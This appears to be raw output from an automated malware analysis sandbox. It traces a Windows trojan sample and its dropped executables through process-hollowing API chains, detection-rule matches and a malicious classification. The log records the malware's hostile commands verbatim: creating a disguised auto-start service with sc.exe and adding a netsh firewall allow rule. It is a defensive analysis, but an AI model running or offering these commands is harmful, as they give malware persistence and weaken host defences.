                      Source: vfgiwcs.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: vfgiwcs.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: vfgiwcs.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xqfkdfcl.exe.29.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xqfkdfcl.exe.29.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xqfkdfcl.exe.29.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xqfkdfcl.exe.29.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeSection loaded: mscorjit.dll
                      Source: OG9rNsihJ7.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\8017.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: String function: 004048D0 appears 460 times
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: String function: 00422BD0 appears 133 times
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: String function: 0041E350 appears 172 times
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: String function: 006C2794 appears 35 times
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: String function: 0040EE2A appears 40 times
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: String function: 00402544 appears 53 times
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: String function: 0041E560 appears 32 times
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_005F0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_00402491 NtOpenKey,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 18_2_00640110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                      Source: 45AA.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: FC2A.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: B1B2.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 3A7E.exe.5.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 7808.exe.5.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 9789.exe.5.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 3A7E.exe.5.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: 3A7E.exe.5.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 3A7E.exe.5.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: 3A7E.exe.5.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: 54AF.exe.5.drStatic PE information: Section: .didata ZLIB complexity 0.999523355577
                      Source: 7808.exe.5.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: 7808.exe.5.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 7808.exe.5.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: 7808.exe.5.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: 9789.exe.5.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: 9789.exe.5.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 9789.exe.5.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: 9789.exe.5.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: OG9rNsihJ7.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vfgiwcsJump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@60/37@100/15
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: OG9rNsihJ7.exeReversingLabs: Detection: 48%
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\OG9rNsihJ7.exe "C:\Users\user\Desktop\OG9rNsihJ7.exe"
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeProcess created: C:\Users\user\Desktop\OG9rNsihJ7.exe "C:\Users\user\Desktop\OG9rNsihJ7.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\vfgiwcs C:\Users\user\AppData\Roaming\vfgiwcs
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsProcess created: C:\Users\user\AppData\Roaming\vfgiwcs C:\Users\user\AppData\Roaming\vfgiwcs
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B1B2.exe C:\Users\user\AppData\Local\Temp\B1B2.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BFBD.exe C:\Users\user\AppData\Local\Temp\BFBD.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6924 -ip 6924
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeProcess created: C:\Users\user\AppData\Local\Temp\BFBD.exe C:\Users\user\AppData\Local\Temp\BFBD.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 520
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\254E.exe C:\Users\user\AppData\Local\Temp\254E.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3136.exe C:\Users\user\AppData\Local\Temp\3136.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3BC6.exe C:\Users\user\AppData\Local\Temp\3BC6.exe
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ffiawxs\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe" C:\Windows\SysWOW64\ffiawxs\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ffiawxs "wifi internet conection
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ffiawxs
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: unknownProcess created: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d"C:\Users\user\AppData\Local\Temp\3136.exe"
                      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess created: C:\Users\user\AppData\Local\Temp\3BC6.exe C:\Users\user\AppData\Local\Temp\3BC6.exe
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeProcess created: C:\Users\user\Desktop\OG9rNsihJ7.exe "C:\Users\user\Desktop\OG9rNsihJ7.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B1B2.exe C:\Users\user\AppData\Local\Temp\B1B2.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BFBD.exe C:\Users\user\AppData\Local\Temp\BFBD.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\254E.exe C:\Users\user\AppData\Local\Temp\254E.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3136.exe C:\Users\user\AppData\Local\Temp\3136.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3BC6.exe C:\Users\user\AppData\Local\Temp\3BC6.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsProcess created: C:\Users\user\AppData\Roaming\vfgiwcs C:\Users\user\AppData\Roaming\vfgiwcs
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6924 -ip 6924
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 520
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeProcess created: C:\Users\user\AppData\Local\Temp\BFBD.exe C:\Users\user\AppData\Local\Temp\BFBD.exe
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ffiawxs\
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe" C:\Windows\SysWOW64\ffiawxs\
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ffiawxs "wifi internet conection
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ffiawxs
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess created: C:\Users\user\AppData\Local\Temp\3BC6.exe C:\Users\user\AppData\Local\Temp\3BC6.exe
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B1B2.tmpJump to behavior
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_00419C55 SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringW,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeap,WritePrivateProfileStringW,SetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2272:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5580:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4560:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6924
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7020:64:WilError_01
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCommand line argument: 0.0
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCommand line argument: hijaduvinijebup
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCommand line argument: mocisacatenu
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCommand line argument: wapejan
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCommand line argument: wovag
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCommand line argument: cbH
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCommand line argument: Piruvora
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCommand line argument: gukafipa
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCommand line argument: mawecamaxe
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCommand line argument: Hiwejanoji
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCommand line argument: Pusazide
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCommand line argument: hukujid
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCommand line argument: cbH
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCommand line argument: cbH
                      Source: 8017.exe.5.dr, Univesity_Grade_Calculator/Form1.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3BC6.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3BC6.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 30.0.3BC6.exe.650000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 30.0.3BC6.exe.650000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 30.0.3BC6.exe.650000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 30.0.3BC6.exe.650000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 30.2.3BC6.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 30.2.3BC6.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 30.0.3BC6.exe.650000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 30.0.3BC6.exe.650000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: OG9rNsihJ7.exeStatic PE information: More than 200 imports for KERNEL32.dll
                      Source: OG9rNsihJ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: OG9rNsihJ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: OG9rNsihJ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: OG9rNsihJ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: OG9rNsihJ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
